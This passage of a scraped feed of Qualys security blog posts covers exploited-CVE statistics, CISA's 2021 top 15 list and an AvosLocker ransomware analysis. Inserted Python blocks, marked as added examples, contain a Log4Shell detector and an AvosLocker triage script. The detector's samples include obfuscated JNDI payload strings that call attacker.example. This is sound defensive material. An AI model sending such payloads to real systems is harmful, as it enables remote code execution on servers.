The TruRisk score clearly indicates why this is a high-risk vulnerability, with more than 400 malware and 50 threat actors exploiting it, and **we see evidence of exploitation as recently as July 16th, 2023, for a 6-year-old vulnerability.**\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-8-Microsoft-Office-Memory-Corruption-Vulnerability_-CVE-2017-11882.jpg>)\n\nFig 8. Microsoft Office Memory Corruption Vulnerability: CVE-2017-11882\n\n## Assess Your Organization's Exposure to Risk / TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk vulnerabilities, especially those exploited in the wild.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-9-1.jpg>)\n\nFig 9. Qualys VMDR TruRisk Dashboard for High-Risk Vulnerabilities\n\nThe fastest method to gain insights into your TruRisk is by downloading and importing the TruRisk Dashboard into your VMDR subscription.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/07/Qualys_VMDR_TruRisk__UDDashboard.zip>)\n\nAnd once you have that visibility, patch with Qualys Patch Management to instantly reduce the risk.\n\n## Key Insights & Takeaways\n\n * The time to Known Exploited Vulnerability (KEV) is down to eight days for CVEs published in 2023. Defenders should leverage automation to patch high-risk vulnerabilities.\n * CVE-2017-11882 stands out as the pinnacle among CVEs in its exploitation by malware, threat actors, and ransomware groups. With over 400 malware, 50 threat actors, and 14 ransomware groups taking advantage of this vulnerability, it will likely be remembered as the most cherished attacker CVE ever.\n * Attackers prominently exploit vulnerabilities in popular applications such as Microsoft Office, Microsoft Exchange, Windows operating systems, Java, Pulse Secure SSL VPN, and Citrix ADC/NetScaler. 
Attackers seek these applications **primarily due to their widespread usage and potential for exploiting security weaknesses.**\n * Organizations should leverage threat intelligence to prioritize vulnerabilities and reduce the risk of exploitation.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a **TruRisk score of 90 or higher,** greatly simplifying the prioritization process.\n\nConcluding this series, in the next blog we will discuss the _**15 most exploited vulnerabilities ever**_.\n\nWatch out for our next blog.\n\n## References\n\n * <https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>\n * <https://blog.qualys.com/qualys-insights/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>\n * <https://blog.qualys.com/vulnerabilities-threat-research/2022/12/16/implement-risk-based-vulnerability-management-with-qualys-trurisk-part-2>\n * <https://blog.qualys.com/qualys-insights/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>\n\n## Additional Contributor\n\nShreya Salvi, Data Scientist, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-07-18T13:38:53", "type": "qualysblog", "title": "Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2019-0903", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0601", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "modified": "2023-07-18T13:38:53", "id": "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. 
It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| 
[ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers 
can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted string that the vulnerable Log4j library interpreted as a JNDI lookup, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products embedded the vulnerable Log4j library and were exposed to Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n#### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and escalate privileges.\n\n#### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. 
Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. 
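The Log4Shell paragraph above describes exploitation as sending a specially crafted string. The following is an added example, not code from the Qualys post, of detection logic for such strings in request data (User-Agent or other header values, form fields): it first collapses the nested `${lower:...}`, `${env:X:-y}` and `${::-x}` lookups that attackers use to hide the `jndi:` keyword from a naive pattern match, then looks for the lookup schemes the exploit used. The set of lookups it resolves is an assumption covering the common evasions, not a reimplementation of Log4j's substitution engine, and the sample values are constructed.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in untrusted input.

Added example, not code from the Qualys post. Log4j 2 expands ${...}
lookups recursively, so exploit strings in the wild hide "jndi" behind
nested lookups such as ${${lower:j}ndi:ldap://...} or ${::-j}ndi:... .
A literal search for "${jndi:" misses those; this normaliser collapses the
common nesting tricks first and then matches the schemes used by the
exploit. The lookups it models are an assumption covering the usual
evasions, not a full model of Log4j's StrSubstitutor.
"""
import re

# Innermost lookup: a ${...} whose body contains no further $ { }.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|nis|http)", re.IGNORECASE)
# Variable lookups whose value the attacker does not control; when the
# variable is unset Log4j substitutes the ":-" default, which is how
# ${env:NOPE:-j} yields "j".
_VARIABLE_PREFIXES = ("env:", "sys:", "date:", "java:", "ctx:", "main:",
                      "k8s:", "spring:", "docker:")


def _resolve_inner(body: str) -> str:
    """Resolve one innermost lookup body to the text Log4j would substitute."""
    key, sep, default = body.partition(":-")
    if key.strip(":") == "":                  # ${::-j} and ${:-j}
        return default
    low = key.lower()
    if low.startswith(("lower:", "upper:")):  # ${lower:J} -> "J"; case is folded later
        return key.split(":", 1)[1]
    if low.startswith(_VARIABLE_PREFIXES):
        return default if sep else ""
    # jndi: and anything not modelled: leave in place so the scheme survives.
    return "${" + body + "}"


def normalise(value: str, max_rounds: int = 20) -> str:
    """Collapse innermost lookups until a fixed point, then lowercase."""
    text = value
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if new == text:
            break
        text = new
    return text.lower()


def is_log4shell_probe(value: str) -> bool:
    return _JNDI.search(normalise(value)) is not None


def scan(lines):
    """(line number, normalised text) for every input line carrying a probe."""
    return [(n, normalise(line)) for n, line in enumerate(lines, 1)
            if is_log4shell_probe(line)]


# Constructed request values of the kind seen in User-Agent or X-Api-Version headers.
SAMPLE_VALUES = [
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
    "${jndi:ldap://attacker.example:1389/a}",
    "${${lower:j}ndi:${lower:l}dap://attacker.example/a}",
    "${${env:NOPE:-j}ndi:rmi://attacker.example/o}",
    "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example}",
    "build ${date:yyyy-MM-dd} home=${env:HOME:-/tmp}",
]

if __name__ == "__main__":
    for n, text in scan(SAMPLE_VALUES):
        print(f"line {n}: {text}")
```

Run it on exported request headers or WAF logs; the normalised text it reports is what the logging library would actually have resolved, which is also the value to hand to whoever triages the callback host.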
\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all of your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities by severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as it propagates across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to widen the asset scope.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. 
Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? 
Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T05:27:25", "description": "_AvosLocker is a ransomware group that was identified in 2021, specifically targeting Windows machines. Now a new variant of AvosLocker malware is also targeting Linux environments. 
In this blog, we examine the behavior of these two AvosLocker ransomware variants in detail._\n\nAvosLocker is a relatively new ransomware-as-a-service that was first spotted in late June 2021. The attackers use spam email campaigns as the initial infection vector for delivering the ransomware payload. During the encryption process, encrypted files are given the ".avos" extension. An updated variant appends the extension ".avos2". Similarly, the Linux version appends the extension ".avoslinux".\n\nAfter every successful attack, the AvosLocker gang releases the names of their victims on their leak site hosted on the TOR network and offers the exfiltrated data for sale. URL structure: `hxxp://avosxxx\u2026xxx[.]onion`\n\nThe AvosLocker gang also advertises their latest ransomware variants on the same leak site. URL structure: `hxxp://avosjonxxx\u2026xxx[.]onion`\n\nThe gang has claimed, \u201cThe AvosLocker's latest Windows variant is one of the fastest in the market with highly scalable threading and selective ciphers.\u201d They offer an affiliate program that provides ransomware-as-a-service (RaaS) for potential partners in crime.\n\nRecently they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines. This allows the gang to target a wider range of organizations. 
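The file extensions named above, together with the ransom-note names, sample hashes and mutex name given later in this analysis, are the cheapest artifacts to sweep a suspect host for. As an added example (not Qualys tooling, and not code from the post), the script below walks a directory tree and reports files carrying the `.avos`, `.avos2` or `.avoslinux` extension, the `GET_YOUR_FILES_BACK.txt` and `README_FOR_RESTORE` notes, and any file whose SHA-256 matches the two IOC hashes; on Windows it also checks whether the `Cheic0WaZie6zeiy` mutex is currently held. The sample tree it builds is constructed for the example (its file hashes will not match the real samples), and the 50 MB hashing cap and the `Findings` structure are my own choices.

```python
"""Triage a directory tree for AvosLocker artifacts.

Added example, not Qualys tooling. It looks for the encrypted-file
extensions, ransom-note names, sample hashes and mutex name that the
analysis attributes to AvosLocker. build_sample_tree() creates a
constructed fixture whose hashes will not match the real samples.
"""
import hashlib
import os
import sys
import tempfile
from dataclasses import dataclass, field

ENCRYPTED_EXTS = {".avos", ".avos2", ".avoslinux"}
RANSOM_NOTES = ("GET_YOUR_FILES_BACK.txt", "README_FOR_RESTORE")
MUTEX_NAME = "Cheic0WaZie6zeiy"
# SHA-256 of the analysed samples, as listed in the post's IOC section.
SAMPLE_SHA256 = {
    "c0a42741eef72991d9d0ee8b6c0531fc19151457a8b59bdcf7b6373d1fe56e02": "AvosLocker Windows sample",
    "7c935dcd672c4854495f41008120288e8e1c144089f1f06a23bd0a0f52a544b1": "AvosLocker Linux sample",
}


@dataclass
class Findings:
    encrypted: list = field(default_factory=list)  # files with an AvosLocker extension
    notes: list = field(default_factory=list)      # ransom notes
    samples: list = field(default_factory=list)    # (path, label) for IOC hash matches

    @property
    def hit(self) -> bool:
        return bool(self.encrypted or self.notes or self.samples)


def sha256_of(path: str, chunk: int = 1 << 20) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def triage(root: str, hash_limit: int = 50 << 20) -> Findings:
    """Walk root once; paths are reported relative to root with '/' separators."""
    found = Findings()
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if os.path.splitext(name)[1].lower() in ENCRYPTED_EXTS:
                found.encrypted.append(rel)
            # The Linux note is quoted with a trailing space in the post, so match the stem.
            if name == RANSOM_NOTES[0] or name.startswith(RANSOM_NOTES[1]):
                found.notes.append(rel)
            try:
                # Hashing is the expensive part; the size cap is an assumption
                # (the samples are small executables), not something from the post.
                if os.path.getsize(path) <= hash_limit:
                    label = SAMPLE_SHA256.get(sha256_of(path))
                    if label:
                        found.samples.append((rel, label))
            except OSError:
                continue  # unreadable, or removed while we were walking
    return found


def mutex_present(name: str = MUTEX_NAME):
    """Windows only: True if some process holds the named mutex the Windows
    variant creates to avoid running twice; None on other platforms."""
    if sys.platform != "win32":
        return None
    import ctypes
    k32 = ctypes.windll.kernel32
    k32.OpenMutexW.restype = ctypes.c_void_p
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    SYNCHRONIZE = 0x00100000
    handle = k32.OpenMutexW(SYNCHRONIZE, False, name)
    if not handle:
        return False
    k32.CloseHandle(handle)
    return True


def build_sample_tree(root: str) -> None:
    """Constructed fixture: two 'encrypted' files, two notes, one clean file."""
    for rel, data in [
        ("docs/report.docx.avos2", b"not really ciphertext"),
        ("docs/GET_YOUR_FILES_BACK.txt", b"your files are encrypted"),
        ("vmfs/volumes/guest.vmdk.avoslinux", b"not really ciphertext"),
        ("vmfs/volumes/README_FOR_RESTORE", b"your files are encrypted"),
        ("docs/clean.txt", b"nothing to see"),
    ]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo() -> Findings:
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return triage(root)


if __name__ == "__main__":
    print("mutex present:", mutex_present())
    print(demo())
```

Point `triage()` at a mounted image or a share rather than a live root if you can; on a live host, the `hit` property is the thing to alert on, and the relative paths tell you which directories the encryptor has already reached.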
It also possesses the ability to kill ESXi VMs, making it particularly nasty.\n\nAccording to [deepweb research](<https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/>) by Cyble Research Labs, the threat actors behind AvosLocker are exploiting Microsoft Exchange Server vulnerabilities (ProxyShell) to compromise the victim\u2019s network.\n\nCVEs involved in these exploits are CVE-2021-34473, CVE-2021-31206, CVE-2021-34523, and CVE-2021-31207.\n\n### Technical Analysis of AvosLocker Windows Variant\n\n#### Command-Line Options\n\nThe following figure shows a sample of the command-line options.\n\nFig. 1: Command Line Option\n\nThe available options allow control over items like enabling/disabling SMB brute force, mutex creation, and the number of concurrent threads. \nIf no options are given, the malware runs with the default options shown in figure 2, where it skips network drives and SMB shares and runs 200 concurrent file-encryption threads.\n\nFig. 2: Execution with Default Parameter\n\nDuring execution, the malware console displays detailed information about its progress on the screen (fig. 3).\n\nFig. 3: Progress Details\n\nMost of the strings in the malware are kept in XOR-encrypted form. The decryption routines are similar; only the registers and keys differ (fig. 4). Strings are decrypted just before their use.\n\nFig. 4: Commonly Used Decryption Routine\n\nInitially, the malware collects the command-line options provided when the application was launched (fig. 5).\n\nFig. 5: Get command-line Options\n\nThen it decrypts the mutex name \u201cCheic0WaZie6zeiy\u201d and checks whether it is already running, to avoid multiple instances (fig. 6).\n\nFig. 6: Mutex Creation\n\nAs shown in figure 7, AvosLocker uses multi-threaded tactics. 
It calls the APIs below to create a pool of worker threads and distribute file paths among them, making full use of multi-core CPUs.\n\nAPIs called:\n\n * CreateIoCompletionPort()\n * PostQueuedCompletionStatus()\n * GetQueuedCompletionStatus()\n\nFig. 7: Use of CreateIoCompletionPort\n\nThe code creates multiple threads in a loop (fig. 8). The threads are set to the highest priority so that data is encrypted quickly.\n\nFig. 8: Create Thread In-Loop and Set Priority\n\nAvosLocker ransomware performs a recursive sweep through the file system (fig. 9), searches for attached drives, and enumerates network resources using the APIs WNetOpenEnum() and WNetEnumResource().\n\nFig. 9: Search Network Share\n\nBefore selecting a file for encryption, it checks the file attributes and skips the file if \u201c**FILE_ATTRIBUTE_HIDDEN**\u201d or \u201c**FILE_ATTRIBUTE_SYSTEM**\u201d is set, as shown in figure 10.\n\nFig. 10: Check File Attribute\n\nOnce the file attribute check is passed, it performs the file extension check. It skips files whose extension matches one of the extensions shown in figure 11.\n\nFig. 11: Skip Extension List\n\nIt also contains a list of files and folders that are to be skipped from encryption (fig. 12).\n\nFig. 12: Skip File Folder List\n\nAvosLocker uses RSA encryption, and it comes with a fixed hardcoded ID and the attacker's RSA public key (fig. 13).\n\nFig. 13: Hardcoded Public Key\n\nAfter file encryption using RSA, it uses the ChaCha20 algorithm to encrypt the encryption-related information (fig. 14).\n\nFig. 14: Use of ChaCha20\n\nIt appends this encryption-related information (fig. 15) at the end of the file in Base64-encoded form.\n\nFig. 15: Encryption Related Information\n\nThen it appends the ".avos2" extension to the file using MoveFileWithProgressW (fig. 16).\n\nFig. 16: Add Extension Using Move File\n\nAs seen in figure 17, the ".avos2" extension has been appended.\n\nFig. 
17: File with Updated Extension\n\nIt writes a ransom note (fig. 18) named \u201cGET_YOUR_FILES_BACK.txt\u201d to each directory before encrypting the files in it.\n\nFig. 18: Ransom Note\n\nThe ransom note instructs the user not to shut down the system while encryption is in progress, to avoid file corruption. It asks the victim to visit the onion address with the TOR browser to pay the ransom and obtain the decryption key and decryptor.\n\n#### AvosLocker Payment System\n\nAfter submitting the "ID" mentioned in the ransom note to AvosLocker's website (fig. 19), the victim is redirected to the "payment" page.\n\nFig. 19: AvosLocker's Website\n\nIf the victim fails to pay the ransom, the attacker puts the victim\u2019s data up for sale. Figure 20 shows the list of victims (redacted for obvious reasons) mentioned on the site.\n\nFig. 20: List of Victims\n\nAvosLocker also offers an affiliate program that provides ransomware-as-a-service (RaaS). They provide \u201chelpful\u201d services to clients such as:\n\n * Support for Windows, Linux & ESXi\n * Affiliate panel\n * Negotiation panel with push & sound notifications\n * Assistance in negotiations\n * Consultations on operations\n * Automatic builds\n * Automatic decryption tests\n * Encryption of network resources\n * Killing of processes and services with open handles to files\n * Highly configurable builds\n * Removal of shadow copies\n * Data storage\n * DDoS attacks\n * Calling services\n * Diverse network of penetration testers, access brokers and other contacts\n\nFig. 21: Partnership Program\n\n### Technical Analysis of AvosLocker Linux Variant\n\nIn this case, the AvosLocker malware arrives as an ELF file. As shown in figure 22, the analyzed file is an x64-based Linux executable.\n\nFig. 22: File Details\n\nIt is a command-line application with a few command-line options (fig. 23).\n\nFig. 
